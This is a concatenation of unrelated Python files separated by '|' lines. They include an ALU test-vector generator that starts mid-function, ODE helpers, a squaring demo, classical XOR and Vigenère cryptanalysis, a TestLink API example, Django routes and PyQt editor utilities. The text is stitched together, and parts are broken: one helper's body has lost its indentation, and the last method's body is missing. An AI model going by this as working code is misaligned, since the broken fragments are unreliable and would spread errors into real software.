        AluTypes.EQ.value:    lambda a, b: a == b,
        AluTypes.NEQ.value:   lambda a, b: a != b,
        AluTypes.SLT.value:   lambda a, b: a < b,
        AluTypes.SLTU.value:  lambda a, b: (a & 0xffffffff) < (b & 0xffffffff),
        AluTypes.SGTE.value:  lambda a, b: a >= b,
        AluTypes.SGTEU.value: lambda a, b: (a & 0xffffffff) >= (b & 0xffffffff),
    }

    # Golden file: expected result (32b) followed by the zero flag (1b).
    outfileGold = f"{basenameNoExt('build', __file__)}_gold.mem"
    with open(outfileGold, 'w') as fp:
        for a, b, op in zip(test_vector_a, test_vector_b, test_vector_op):
            val = golden_ops.get(op, lambda a, b: 0)(a, b)
            gold = f"{val:032b}" + f"{1 if val == 0 else 0:01b}"
            print(gold, file=fp)
import inspect
from typing import Callable, List, Text
__all__ = ["infer_variable_names", "infer_separability"]
def infer_variable_names(rhs: Callable) -> List[Text]:
    """
    Infer the variable names from the right-hand side function of an ODE model.

    Recognizes the standard ``(t, y)`` and ``(t, q, p)`` signatures first;
    otherwise falls back to the positional (non-defaulted) arguments.

    Fixes vs. the original: ``getfullargspec(...).defaults`` is ``None``
    (not an empty tuple) when there are no keyword defaults, which crashed
    ``len()``; and with zero defaults the slice ``args[:-0]`` wrongly
    returned ``[]`` instead of all arguments.

    Args:
        rhs: Right-hand side to infer variable names from.

    Returns:
        A list containing the ODE variable names.

    Raises:
        ValueError: if fewer than two positional arguments remain.
    """
    ode_spec = inspect.getfullargspec(func=rhs)
    args = ode_spec.args
    arg_set = set(args)
    # check if the function spec is either of the standard ones
    if {"t", "y"}.issubset(arg_set):
        return ["t", "y"]
    if {"t", "q", "p"}.issubset(arg_set):
        return ["t", "q", "p"]
    # otherwise infer the variable names as the non-defaulted positional args
    num_defaults = len(ode_spec.defaults or ())
    num_positional = len(args) - num_defaults
    if num_positional >= 2:
        return args[:num_positional]
    raise ValueError("Incompatible function signature for ODE integration.")
def infer_separability(q_derivative: Callable, p_derivative: Callable) -> bool:
    """
    Infer whether a Hamiltonian is separable.

    A Hamiltonian counts as separable here when its q-derivative does not
    depend on p and its p-derivative does not depend on q, judged purely
    from the derivative function signatures.

    Args:
        q_derivative: Function returning the (vector-valued) q-derivative of the Hamiltonian.
        p_derivative: Function returning the (vector-valued) p-derivative of the Hamiltonian.

    Returns:
        A boolean indicating whether or not the Hamiltonian is separable based on its derivatives.
    """
    q_vars = set(infer_variable_names(q_derivative))
    p_vars = set(infer_variable_names(p_derivative))
    # TODO: Devise more / better checks than just derivative signatures
    return "q" not in p_vars and "p" not in q_vars
|
#It is known that summing consecutive odd numbers gives the square of a number:
# 1+3=4 which is the square of 2
#1+3+5=9, and so on.
# This program computes the square of an entered number using this method:
#to find the square of 6 we add the first six odd numbers -> 1+3+5+7+9+11
# Compatibility shim: make print() behave as a function on Python 2.6+.
from __future__ import print_function
import sys
# On Python 2, input() evaluates the typed text; alias raw_input so the
# prompt below always returns a plain string.
if sys.version_info[0] < 3:
    input = raw_input
def prime_finder(num):
    """Return num**2, computed as the sum of the first ``num`` odd numbers.

    1 + 3 + ... + (2*num - 1) == num**2. The name is kept for backward
    compatibility even though the function has nothing to do with primes.

    Fix: negative inputs now return the square as well (the original
    returned 0 for them); 0 still returns 0.
    """
    return sum(range(1, 2 * abs(num), 2))
# fix: guard the interactive part so importing this module doesn't prompt
if __name__ == "__main__":
    number = input("Enter the number you want to find square of-->")
    print("The square of " + number + " is " + str(prime_finder(int(number))))
|
# -*- coding: utf-8 -*-
import string
from collections import defaultdict
from commons import hamming_bin, chunked, sxor
# Relative frequency of each printable ASCII character — presumably measured
# on an English corpus with letters folded to uppercase (TODO confirm source).
# Characters absent from the corpus get a tiny pseudo-frequency of 1e-10 so
# the chi-squared test never divides by zero.
ASCII_PRINTABLE_FREQS = {
    '\n': 0.02908045733331944, '!': 0.0007948248708319754, ' ': 0.20026065368955764, '#': 8.983102066365002e-08,
    '"': 0.0007286194086028653, '%': 8.983102066365002e-08, "'": 0.0034381924848805407, '&': 3.683071847209651e-06,
    ')': 0.0002185588732746605, '(': 0.00021918769041930606, '+': 6.288171446455501e-07, '*': 0.0004286736306069379,
    '-': 0.005938998269135894, ',': 0.011704263344308288, '/': 0.00038097335863453976, '.': 0.012773971138371034,
    '1': 0.00532608121514781, '0': 0.005744783602461083, '3': 0.0024439427481752624, '2': 0.002924089553622472,
    '5': 0.002122886680323377, '4': 0.0019301093099791844, '7': 0.0023404574123707376, '6': 0.0016947520358404212,
    '9': 0.002559824764831371, '8': 0.002376299989615534, ';': 0.001549315613385972, ':': 0.0013420754487149314,
    '=': 1.2666173913574653e-05, '<': 4.617314462111611e-05, '?': 0.0009441240271749617, '>': 4.392736910452486e-05,
    'A': 0.05671014368292093, '@': 2.3356065372549006e-06, 'C': 0.02176228340393453, 'B': 0.01195066983398868,
    'E': 0.08188097533491699, 'D': 0.028140645195136333, 'G': 0.01255190885529049, 'F': 0.016342688096275856,
    'I': 0.04845197795331158, 'H': 0.033517750430021094, 'K': 0.005907108256800298, 'J': 0.0013359669393098032,
    'M': 0.019710812385038752, 'L': 0.030766495760155485, 'O': 0.05332656845860389, 'N': 0.0478192980747775,
    'Q': 0.0009655038100929104, 'P': 0.014217645471456552, 'S': 0.04791676473219756, 'R': 0.048143677890393935,
    'U': 0.022709821009894708, 'T': 0.06040731900037478, 'W': 0.012794632273123673, 'V': 0.007006370456661384,
    'Y': 0.013791487109428197, 'X': 0.001594949771883106, '[': 0.000188914636455656, 'Z': 0.0005081740838942682,
    ']': 0.0001881959882903468, '\\': 1.7966204132730004e-07, '_': 6.467833487782802e-06, '^': 5.389861239819001e-07,
    '`': 8.983102066365002e-08, '{': 2.4254375579185508e-06, '}': 2.6050995992458507e-06, '|': 2.964423681900451e-06,
    '~': 2.6949306199095004e-07, '$': 1e-10, '\r': 1e-10, '\t': 1e-10, '\x0b': 1e-10, '\x0c': 1e-10
}
def chi2_printable(s):
    """
    χ² statistic of *s* against ASCII_PRINTABLE_FREQS.

    Lowercase letters are folded onto their uppercase counts; any character
    outside string.printable short-circuits to float('inf') (worst score).
    """
    counts = defaultdict(int)
    for ch in s:
        if ch not in string.printable:
            return float('inf')
        key = ch.upper() if ch in string.ascii_lowercase else ch
        counts[key] += 1
    n = len(s)
    total = 0
    for ch, freq in ASCII_PRINTABLE_FREQS.items():
        expected = n * freq
        total += (counts[ch] - expected) ** 2 / expected
    return total
def rotN(text, n, alphabet=string.ascii_lowercase):
    """Rotate *text* by *n* positions within *alphabet* (Caesar shift).

    Characters not found in the alphabet pass through unchanged.
    """
    size = len(alphabet)
    out = []
    for ch in text:
        pos = alphabet.find(ch)
        out.append(ch if pos < 0 else alphabet[(pos + n) % size])
    return ''.join(out)
def _xor_guess_key_size(ct, top_results=5, max_key_size=64):
    """Rank likely repeating-XOR key sizes for ciphertext *ct*.

    Scores each candidate size by the average normalized Hamming distance
    between consecutive ciphertext chunks; returns the best sizes, lowest
    distance first.
    """
    scored = []
    for size in range(2, max_key_size + 1):
        chunks = chunked(ct, size)
        dists = [hamming_bin(chunks[i], chunks[i + 1]) / float(size)
                 for i in range(len(chunks) - 1)]
        scored.append((sum(dists) / len(dists), size))
    scored.sort()
    return [size for _, size in scored[:top_results]]
def _xor_key_candidate(ct, keysize):
    """Guess the repeating-XOR key of length *keysize* for ciphertext *ct*.

    For each key position, tries all 256 single-byte XORs of the matching
    ciphertext column and keeps the byte whose decryption scores best under
    the printable-English χ² test.

    Returns a (χ² of full plaintext, key, plaintext) tuple, or None when
    some column produces nothing printable (i.e. this key size is wrong).

    NOTE(review): Python 2 code — ``i/len(blocks)`` relies on integer
    division and ``chr``/``sxor`` on byte-as-str semantics; porting to
    Python 3 needs ``//`` and bytes handling.
    """
    blocks = []
    for i in range(keysize):
        # every keysize-th byte was XORed with the same key byte
        group = ct[i::keysize]
        ppts = [(sxor(group, chr(i)*len(group)), i) for i in range(256)]
        # list of -> ((singly_xored_text, xor_char), χ²)
        results = map(lambda x: (x, chi2_printable(x[0])), ppts)
        results = sorted(results, key=lambda x: x[1])
        if results[0][1] == float('inf'):
            # key size doesn't produce anything printable
            return None
        blocks.append(results[0][0])
    # interleave the per-column plaintexts back into one string
    ppt = ''.join([blocks[i%keysize][0][i/len(blocks)]
                   for i in range(len(ct))])
    pkey = ''.join(map(chr, [b[1] for b in blocks]))
    return (chi2_printable(ppt), pkey, ppt)
def _rot_key_candidate(ct, keysize, alphabet=string.ascii_lowercase):
    """Apply the same principles as repeating key xor to find possible candidate
    for a Vigenere key. It will almost surely return wrong prediction but it may
    be close enough that you can guess the key. Experimental.

    Returns a (χ² of full plaintext, key, plaintext) tuple, or None when a
    column produces nothing printable.

    NOTE(review): keysize == 0 passes the check below but fails later with
    a modulo-by-zero; Python 2 integer division is relied on in
    ``i/len(blocks)``.
    """
    if keysize < 0:
        raise Exception("Invalid keysize; must be positive")
    blocks = []
    for i in range(keysize):
        # every keysize-th character was rotated by the same key character
        group = ct[i::keysize]
        # try every rotation; remember the key char that would produce it
        ppts = [(rotN(group, i+1, alphabet), alphabet[ (len(alphabet)-i-1)%len(alphabet) ])
                for i in range(len(alphabet))]
        # list of -> ((rotated text, key char), χ²)
        results = map(lambda x: (x, chi2_printable(x[0])), ppts)
        results = sorted(results, key=lambda x: x[1])
        if results[0][1] == float('inf'):
            # key size doesn't produce anything printable
            return None
        blocks.append(results[0][0])
    # interleave the per-column plaintexts back into one string
    ppt = ''.join([blocks[i%keysize][0][i/len(blocks)]
                   for i in range(len(ct))])
    pkey = ''.join([b[1] for b in blocks])
    return (chi2_printable(ppt), pkey, ppt)
# TODO: Filter out duplicate keys
def repeating_xor_decrypt(ct, top_results=5, keysize=None, key=None):
    """Tries to decrypt english text that has been XORed with a repeating key.

    Accepts the binary ciphertext and, optionally, the keysize if it's known.
    If no keysize given tries to guess based on hamming binary distance.
    Returns a list of (key, plaintext) tuples, up to specified number of top
    results, sorted most to least likely. Can return less if not enough
    candidates.
    """
    if key:
        # fix: floor division keeps the repetition count an int on Python 3
        # as well (plain / was Python-2 integer division here).
        # NOTE(review): if len(ct) is not a multiple of len(key) the repeated
        # key is truncated short — pre-existing behavior, kept as-is.
        return [(key, sxor(ct, key * (len(ct) // len(key))))]
    if keysize:
        if type(keysize) not in [int, float] or keysize < 1:
            raise Exception("Keysize invalid")
        ksizes = [keysize]
    else:
        ksizes = _xor_guess_key_size(ct)
    candidates = []
    for ksize in ksizes:
        candidate = _xor_key_candidate(ct, ksize)
        if candidate:
            candidates.append(candidate)
    # candidates sort by χ² first, so the best decryptions come out on top
    return [(c[1], c[2]) for c in sorted(candidates)][:top_results]
def vigenere_decrypt(ct, key, alphabet=string.ascii_lowercase):
    """Decrypt a Vigenère ciphertext with *key*.

    Characters outside *alphabet* are copied through unchanged without
    consuming a key character.
    """
    if not all(c in alphabet for c in key):
        raise Exception("Key must only contain alphabet characters")
    size = len(alphabet)
    out = []
    ki = 0
    for c in ct:
        if c not in alphabet:
            out.append(c)
            continue
        # decrypting == rotating forward by the key character's complement
        shift = (size - alphabet.index(key[ki])) % size
        out.append(alphabet[(alphabet.index(c) + shift) % size])
        ki = (ki + 1) % len(key)
    return ''.join(out)
def _sort_counter_dict(d, reverse):
ks = sorted(d, key=lambda x: d[x], reverse=reverse)
return [(k, d[k]) for k in ks]
def count_ngrams(ct, n):
    """Counts ngrams in ciphertext and returns a dictionary of ngram -> count.

    Raises ValueError when n is not positive.
    """
    if n < 1:
        raise ValueError("n must be positive")
    counts = defaultdict(int)
    for start in range(len(ct) - n + 1):
        counts[ct[start:start + n]] += 1
    return dict(counts)
def sorted_ngrams(ct, n, reverse=True):
    """Return (ngram, count) tuples sorted by count.

    Descending by default; pass reverse=False for ascending order.
    """
    return _sort_counter_dict(count_ngrams(ct, n), reverse)
def count_doubles(ct):
    """Count doubled letters in *ct*, returning {pair: count}.

    Pairs are non-overlapping: each character belongs to at most one
    double, so 'abccc' yields {'cc': 1}.
    """
    doubles = defaultdict(int)
    i = 0
    last = len(ct) - 1
    while i < last:
        if ct[i] == ct[i + 1]:
            doubles[ct[i] * 2] += 1
            i += 2
        else:
            i += 1
    return dict(doubles)
def sorted_doubles(ct, reverse=True):
    """Return (double, count) tuples sorted by count.

    Descending by default; pass reverse=False for ascending order.
    """
    return _sort_counter_dict(count_doubles(ct), reverse)
|
#! /usr/bin/python
# -*- coding: UTF-8 -*-
# Copyright 2013-2018 Luiko Czub, TestLink-API-Python-client developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------
"""
Shows how to use the TestLinkAPI for custom fields
This example requires a special existing project with special custom fields
assigned
a) run example TestLinkExample.py
- this creates a project like NEW_PROJECT_API-34
b) load custom field definitions customFields_ExampleDefs.xml
TL - Desktop - System - Define Custom Fields - Import
c) assign custom fields to project NEW_PROJECT_API-34
TL - Desktop - Test Project - Assign Custom Fields
d) load keyword definitions keywords_ExampleDefs.xml
TL - Desktop - Test Project - Keyword Management
Script works with:
TestProject NEW_PROJECT_API-34
- TestSuite B - First Level
- TestCase TESTCASE_B
- TestPlan TestPlan_API A (Platform Small Bird)
- Build TestlinkAPIClient v0.x.y
Script creates custom values for TestCase TESTCASE_B
- scope test specification and test execution
Script returns custom field values from TestPlan and TestSuite, if the user has
added manually some values.
Because it is not known how ids of kind
- requirement and requirement specifications
- testplan - testcase link
can be requested via the api, these examples do not work currently.
Script adds keywords KeyWord01 KeyWord02 KeyWord03 to test case TESTCASE_B,
removes keyword KeyWord02 again.
Script adds keywords KeyWord01 KeyWord02 to test case TESTCASE_AA,
removes keyword KeyWord01 again.
"""
from testlink import TestlinkAPIClient, TestLinkHelper
from testlink.testlinkerrors import TLResponseError
import sys, os.path
from platform import python_version
# precondition a)
# SERVER_URL and KEY are defined in environment
# TESTLINK_API_PYTHON_SERVER_URL=http://YOURSERVER/testlink/lib/api/xmlrpc.php
# TESTLINK_API_PYTHON_DEVKEY=7ec252ab966ce88fd92c25d08635672b
#
# alternative precondition b)
# SERVEUR_URL and KEY are defined as command line arguments
# python TestLinkExample.py --server_url http://YOURSERVER/testlink/lib/api/xmlrpc.php
# --devKey 7ec252ab966ce88fd92c25d08635672b
#
# ATTENTION: With TestLink 1.9.7, cause of the new REST API, the SERVER_URL
# has changed from
# (old) http://YOURSERVER/testlink/lib/api/xmlrpc.php
# to
# (new) http://YOURSERVER/testlink/lib/api/xmlrpc/v1/xmlrpc.php
tl_helper = TestLinkHelper()
tl_helper.setParamsFromArgs('''Shows how to use the TestLinkAPI for CustomFields.
=> requires an existing project NEW_PROJECT_API-*''')
myTestLink = tl_helper.connect(TestlinkAPIClient)
myPyVersion = python_version()
myPyVersionShort = myPyVersion.replace('.', '')[:2]
NEWTESTPLAN_A="TestPlan_API A"
# NEWTESTPLAN_B="TestPlan_API B"
# NEWTESTPLAN_C="TestPlan_API C - DeleteTest"
# NEWPLATFORM_A='Big Birds %s' % myPyVersionShort
NEWPLATFORM_B='Small Birds'
# NEWPLATFORM_C='Ugly Birds'
NEWTESTSUITE_A="A - First Level"
NEWTESTSUITE_B="B - First Level"
NEWTESTSUITE_AA="AA - Second Level"
NEWTESTCASE_AA="TESTCASE_AA"
NEWTESTCASE_B="TESTCASE_B"
# myApiVersion='%s v%s' % (myTestLink.__class__.__name__ , myTestLink.__version__)
# NEWBUILD_A='%s' % myApiVersion
# NEWBUILD_B='%s' % myApiVersion
# NEWBUILD_C='%s - DeleteTest' % myApiVersion
# NEWBUILD_D='%s - copyTestersTest' % myApiVersion
this_file_dirname=os.path.dirname(__file__)
NEWATTACHMENT_PY= os.path.join(this_file_dirname, 'TestLinkExample.py')
NEWATTACHMENT_PNG=os.path.join(this_file_dirname, 'PyGreat.png')
# Servers TestLink Version
myTLVersion = myTestLink.testLinkVersion()
myTLVersionShort = myTLVersion.replace('.', '')
NEWPROJECT="NEW_PROJECT_API-%s" % myPyVersionShort
NEWPREFIX="NPROAPI%s" % myPyVersionShort
ITSNAME="myITS"
# used connection settings
print( myTestLink.connectionInfo() )
print( "" )
# get information - TestProject
newProject = myTestLink.getTestProjectByName(NEWPROJECT)
print( "getTestProjectByName", newProject )
newProjectID = newProject['id']
print( "Project '%s' - id: %s" % (NEWPROJECT,newProjectID) )
response = myTestLink.getProjectKeywords(newProjectID)
print("getProjectKeywords", response)
# get information - TestPlan
newTestPlan = myTestLink.getTestPlanByName(NEWPROJECT, NEWTESTPLAN_A)
print( "getTestPlanByName", newTestPlan )
newTestPlanID_A = newTestPlan[0]['id']
print( "Test Plan '%s' - id: %s" % (NEWTESTPLAN_A,newTestPlanID_A) )
response = myTestLink.getTotalsForTestPlan(newTestPlanID_A)
print( "getTotalsForTestPlan", response )
response = myTestLink.getBuildsForTestPlan(newTestPlanID_A)
print( "getBuildsForTestPlan", response )
newBuildID_A = response[0]['id']
newBuildName_A = response[0]['name']
# get information - TestSuite
response = myTestLink.getTestSuitesForTestPlan(newTestPlanID_A)
print( "getTestSuitesForTestPlan", response )
newTestSuiteID_A=response[0]['id']
newTestSuiteID_AA=response[1]['id']
newTestSuiteID_B=response[2]['id']
newTestSuite = myTestLink.getTestSuiteByID(newTestSuiteID_B)
print( "getTestSuiteByID", newTestSuite )
# get information - TestCase_B
response = myTestLink.getTestCaseIDByName(NEWTESTCASE_B, testprojectname=NEWPROJECT)
print( "getTestCaseIDByName", response )
newTestCaseID_B = response[0]['id']
tc_b_full_ext_id = myTestLink.getTestCase(newTestCaseID_B)[0]['full_tc_external_id']
print( "Test Case '%s' - id: %s - ext-id %s" % (NEWTESTCASE_B, newTestCaseID_B, tc_b_full_ext_id) )
# get information - TestCase_AA
response = myTestLink.getTestCaseIDByName(NEWTESTCASE_AA, testprojectname=NEWPROJECT)
print( "getTestCaseIDByName", response )
newTestCaseID_AA = response[0]['id']
tc_aa_full_ext_id = myTestLink.getTestCase(newTestCaseID_AA)[0]['full_tc_external_id']
print( "Test Case '%s' - id: %s - ext-id %s" % (NEWTESTCASE_AA, newTestCaseID_AA, tc_aa_full_ext_id) )
# add keywords to TestCase B and TestCase AA
response = myTestLink.addTestCaseKeywords(
{tc_b_full_ext_id : ['KeyWord01', 'KeyWord03', 'KeyWord02'],
tc_aa_full_ext_id : ['KeyWord01', 'KeyWord02', 'KeyWord03']})
print( "addTestCaseKeywords", response )
# remove keywords from TestCase B and TestCase AA
response = myTestLink.removeTestCaseKeywords(
{tc_b_full_ext_id : ['KeyWord02'],
tc_aa_full_ext_id : ['KeyWord01', 'KeyWord03']})
print( "removeTestCaseKeywords", response )
# list test cases with assigned keywords B
response = myTestLink.getTestCasesForTestSuite(newTestSuiteID_B, True,
'full', getkeywords=True)
print( "getTestCasesForTestSuite B (deep=True)", response )
response = myTestLink.getTestCasesForTestSuite(newTestSuiteID_B, False,
'full', getkeywords=True)
print( "getTestCasesForTestSuite B (deep=False)", response )
# get information - TestCase_B again
newTestCase_B = myTestLink.getTestCase(testcaseid=newTestCaseID_B)[0]
print( "getTestCase B", newTestCase_B )
# return keyword list for TestCase_B
response = myTestLink.listKeywordsForTC(newTestCaseID_B)
print( "listKeywordsForTC B", response )
# return keyword lists for all test cases of test newTestSuite_B
response = myTestLink.listKeywordsForTS(newTestSuiteID_B)
print( "listKeywordsForTS B", response )
# list test cases with assigned keywords AA
response = myTestLink.getTestCasesForTestSuite(newTestSuiteID_A, True,
'full', getkeywords=True)
print( "getTestCasesForTestSuite A (deep=True)", response )
response = myTestLink.getTestCasesForTestSuite(newTestSuiteID_A, False,
'full', getkeywords=True)
print( "getTestCasesForTestSuite A (deep=False)", response )
# get information - TestCase_AA again
newTestCase_AA = myTestLink.getTestCase(testcaseid=newTestCaseID_AA)[0]
print( "getTestCase AA", newTestCase_AA )
# return keyword list for TestCase_AA
response = myTestLink.listKeywordsForTC(newTestCaseID_AA)
print( "listKeywordsForTC AA", response )
# return keyword lists for all test cases of test newTestSuite_A
# NOTE(review): chunk of a larger TestLink XML-RPC example script; the
# objects used here (myTestLink client, newTestSuiteID_*, newTestCaseID_*,
# newTestPlanID_A, newBuildName_A/ID_A, NEWPLATFORM_B, newProjectID,
# newTestCase_B) are all created earlier in the file.
response = myTestLink.listKeywordsForTS(newTestSuiteID_AA)
print( "listKeywordsForTS AA", response )
response = myTestLink.getTestCaseKeywords(testcaseid=newTestCaseID_B)
print("getTestCaseKeywords B", response)
response = myTestLink.getTestCaseKeywords(testcaseid=newTestCaseID_AA)
print("getTestCaseKeywords AA", response)
# new execution result with custom field data
# TC_B passed, explicit build and some notes , TC identified with internal id
newResult = myTestLink.reportTCResult(newTestCaseID_B, newTestPlanID_A,
            newBuildName_A, 'p', "bugid 4711 is assigned",
            platformname=NEWPLATFORM_B, bugid='4711',
            customfields={'cf_tc_ex_string' : 'a custom exec value set via api',
                          'cf_tc_sd_listen' : 'ernie'})
print( "reportTCResult", newResult )
# get execution results
lastResult = myTestLink.getLastExecutionResult(newTestPlanID_A, newTestCaseID_B,
                                               options={'getBugs' : True})[0]
print( "getLastExecutionResult", lastResult )
# map of used ids (collected once so the custom-field calls below stay short)
args = {'devKey' : myTestLink.devKey,
        'testprojectid' : newProjectID,
        'testcaseexternalid' : newTestCase_B['full_tc_external_id'],
        'version' : int(newTestCase_B['version']),
        'tcversion_number' : lastResult['tcversion_number'],
        'executionid' : lastResult['id'],
        'linkid' : 779,
        'testsuiteid': newTestSuiteID_B,
        'testplanid': lastResult['testplan_id'],
        'reqspecid': 7789,
        'requirementid': 7791,
        'buildid':newBuildID_A}
# get CustomField Value - TestCase Execution
response = myTestLink.getTestCaseCustomFieldExecutionValue(
                'cf_tc_ex_string', args['testprojectid'], args['tcversion_number'],
                args['executionid'] , args['testplanid'] )
print( "getTestCaseCustomFieldExecutionValue", response )
# update CustomField Value - TestCase SpecDesign
response = myTestLink.updateTestCaseCustomFieldDesignValue(
                args['testcaseexternalid'], args['version'],
                args['testprojectid'],
                {'cf_tc_sd_string' : 'A custom SpecDesign value set via api',
                 'cf_tc_sd_list' : 'bibo'})
print( "updateTestCaseCustomFieldDesignValue", response )
# get CustomField Value - TestCase SpecDesign (details: full / value / simple)
#response = myTestLink._callServer('getTestCaseCustomFieldDesignValue', args)
response = myTestLink.getTestCaseCustomFieldDesignValue(
                args['testcaseexternalid'], args['version'],
                args['testprojectid'], 'cf_tc_sd_string', 'full')
print( "getTestCaseCustomFieldDesignValue full", response )
response = myTestLink.getTestCaseCustomFieldDesignValue(
                args['testcaseexternalid'], args['version'],
                args['testprojectid'], 'cf_tc_sd_string', 'value')
print( "getTestCaseCustomFieldDesignValue value", response )
response = myTestLink.getTestCaseCustomFieldDesignValue(
                args['testcaseexternalid'], args['version'],
                args['testprojectid'], 'cf_tc_sd_list', 'simple')
print( "getTestCaseCustomFieldDesignValue simple", response )
# get CustomField Value - TestCase Testplan Design
response = myTestLink.getTestCaseCustomFieldTestPlanDesignValue(
                'cf_tc_pd_string', args['testprojectid'], args['tcversion_number'],
                args['testplanid'], args['linkid'])
print( "getTestCaseCustomFieldTestPlanDesignValue", response )
# update CustomField Value - TestSuite SpecDesign
response = myTestLink.updateTestSuiteCustomFieldDesignValue(
                args['testprojectid'], args['testsuiteid'],
                {'cf_ts_string' : 'A custom TestSuite value set via api'})
print( "updateTestSuiteCustomFieldDesignValue", response )
# get CustomField Value - TestSuite
response = myTestLink.getTestSuiteCustomFieldDesignValue(
                'cf_ts_string', args['testprojectid'], args['testsuiteid'])
print( "getTestSuiteCustomFieldDesignValue", response )
# get CustomField Value - TestPlan
response = myTestLink.getTestPlanCustomFieldDesignValue(
                'cf_tp_string', args['testprojectid'], args['testplanid'])
print( "getTestPlanCustomFieldDesignValue", response )
# get CustomField Value - Requirement Specification
response = myTestLink.getReqSpecCustomFieldDesignValue(
                'cf_req_sd_string', args['testprojectid'], args['reqspecid'])
print( "getReqSpecCustomFieldDesignValue", response )
# get CustomField Value - Requirement
response = myTestLink.getRequirementCustomFieldDesignValue(
                'cf_req_string',args['testprojectid'], args['requirementid'])
print( "getRequirementCustomFieldDesignValue", response )
# update CustomField Value - Build
response = myTestLink.updateBuildCustomFieldsValues(
                args['testprojectid'], args['testplanid'], args['buildid'],
                {'cf_b_string' : 'A custom Build value set via api'})
print( "updateBuildCustomFieldsValues", response )
|
# URL routing for the books app.
# NOTE(review): ``include`` is imported but not used in this module.
from django.urls import path, include
from . import views
urlpatterns = [
    path('', views.index, name='index'),
    path('books', views.books, name='books'),
    # <int:id> is the primary key of the book to update/delete.
    path('update/<int:id>', views.update, name='update'),
    path('delete/<int:id>', views.delete, name='delete'),
]
import os
import re
import subprocess
from typing import *
import pexpect
from PyQt5 import QtWidgets
from PyQt5.QtCore import QThread, QMutex
def get_temp_file(lang: str) -> str:
    """Return the path of the scratch source file for *lang*.

    The file lives next to this module.  Unknown languages fall back to
    the C++ temp file, matching the other ``lang`` dispatch helpers here.
    (Fix: the original mixed a dangling ``if`` with an ``if/else``, so the
    fallthrough was easy to misread; now a single if/elif/else chain.)
    """
    if lang == "rust":
        name = "temp.rs"
    elif lang == "python3":
        name = "temp.py"
    else:
        name = "temp.cpp"
    return os.path.join(os.path.dirname(__file__), name)
def disp_error(message: str):
    """Show *message* in a modal Qt error dialog and block until dismissed."""
    error = QtWidgets.QErrorMessage()
    error.showMessage(message)
    # exec_() spins a nested event loop until the dialog is closed.
    error.exec_()
def racer_enable() -> bool:
    """Report whether the ``racer`` Rust completion tool is usable.

    Runs ``racer --version`` and checks that the output starts with
    "racer".  Returns False when the binary exits with an error *or is
    not installed at all* (fix: the original only caught
    CalledProcessError, so a missing binary raised FileNotFoundError).
    """
    try:
        output = subprocess.check_output(("racer", "--version"))
    except (subprocess.CalledProcessError, OSError):
        # OSError covers FileNotFoundError when racer is not on PATH.
        return False
    return output.decode().startswith("racer")
def debug_command(lang: str) -> str:
    """Return the debugger invocation string for *lang*.

    rust uses rust-gdb with backtraces enabled, python3 uses pdb, and
    everything else falls back to plain gdb.
    """
    commands = {
        "rust": "env RUST_BACKTRACE=1 rust-gdb",
        "python3": "python3 -m pdb",
    }
    return commands.get(lang, "gdb")
def compile_command(lang: str, no_debug: bool) -> List[str]:
    """Return the compiler/checker argv for *lang*.

    ``no_debug`` picks the optimised variant where it applies; for
    python3 the "compile" step is only a syntax check.
    """
    if lang == "rust":
        argv = ["rustc"]
        if not no_debug:
            argv.append("-g")
        return argv
    if lang == "python3":
        checker = os.path.join(os.path.dirname(__file__), "py_syntax_checker.py")
        return ["python3", checker]
    # C++ (default): optimised build drops -g, debug build drops -O2.
    variant = (
        ["-O2", "-fsanitize=undefined"]
        if no_debug
        else ["-fsanitize=undefined", "-g"]
    )
    return (
        ["g++", "-std=gnu++1y"]
        + variant
        + ["-I/opt/boost/gcc/include", "-L/opt/boost/gcc/lib"]
    )
def get_compiled_file(lang: str, fname: str) -> str:
    """Map a source file name to the artefact that will be executed."""
    if lang == "python3":
        # Interpreted: the "compiled" file is the source itself.
        return fname
    if lang == "rust":
        # rustc names the binary after the source file, minus ".rs".
        return "./" + os.path.basename(fname.replace(".rs", ""))
    # g++ default output name.
    return "./a.out"
def exec_format(lang: str) -> bool:
    """Run the per-language formatter in place on the temp source file.

    Returns True on success, False when the formatter fails or cannot
    be launched at all.
    """
    target = get_temp_file(lang)
    if lang == "rust":
        argv = ("rustfmt", target)
    elif lang == "python3":
        argv = ("autopep8", "-i", target)
    else:
        argv = ("clang-format", "-i", target)
    try:
        subprocess.check_output(argv, stderr=subprocess.STDOUT)
    except Exception:
        return False
    return True
def exec_command(lang: str) -> List[str]:
    """Return the argv prefix needed to run the compiled artefact.

    rust binaries run with backtraces enabled, python3 needs the
    interpreter, and C++ binaries need no prefix.
    """
    if lang == "python3":
        return ["python3"]
    if lang == "rust":
        return ["env", "RUST_BACKTRACE=1"]
    return []
def indent_width(lang: str) -> int:
    """Spaces per indentation level: 4 for rust/python3, 2 otherwise (C++)."""
    return 4 if lang in ("rust", "python3") else 2
class StateLessTextEdit(QtWidgets.QLineEdit):
    """Line edit whose value is NOT persisted to QSettings.

    NOTE(review): ``self.parent`` shadows ``QWidget.parent()``; kept
    unchanged because existing callers may read the attribute.
    """

    def __init__(self, value: str, parent):
        super().__init__()
        self.parent = parent  # owning dialog/widget
        self.setText(value)
# Need to call commit to serialize value (applies to the State*full* widgets below)
class StateFullTextEdit(QtWidgets.QLineEdit):
    """Line edit backed by a QSettings key; call ``commit()`` to persist.

    The stored value (if any) pre-fills the widget; *default* is used
    only when nothing non-empty is stored.
    """

    def __init__(self, settings, name: str, parent, default: Optional[str] = None):
        super().__init__()
        self.parent = parent      # owning dialog/widget
        self.settings = settings  # QSettings instance
        self.name = name          # settings key
        v = settings.value(name, type=str)
        self.setText(v)
        # Falsy ``v`` means key missing OR stored value was "" — both
        # fall back to the default.
        if not v and default is not None:
            self.setText(default)

    def commit(self):
        """Write the current text back to QSettings under ``self.name``."""
        self.settings.setValue(self.name, self.text())
class StateFullCheckBox(QtWidgets.QCheckBox):
    """Check box backed by a QSettings key; call ``commit()`` to persist.

    A missing key reads back as False (QSettings bool default).
    """

    def __init__(self, settings, name: str, parent):
        super().__init__()
        self.parent = parent      # owning dialog/widget
        self.settings = settings  # QSettings instance
        self.name = name          # settings key
        v = settings.value(name, type=bool)
        self.setChecked(v)

    def commit(self):
        """Write the current checked state back to QSettings."""
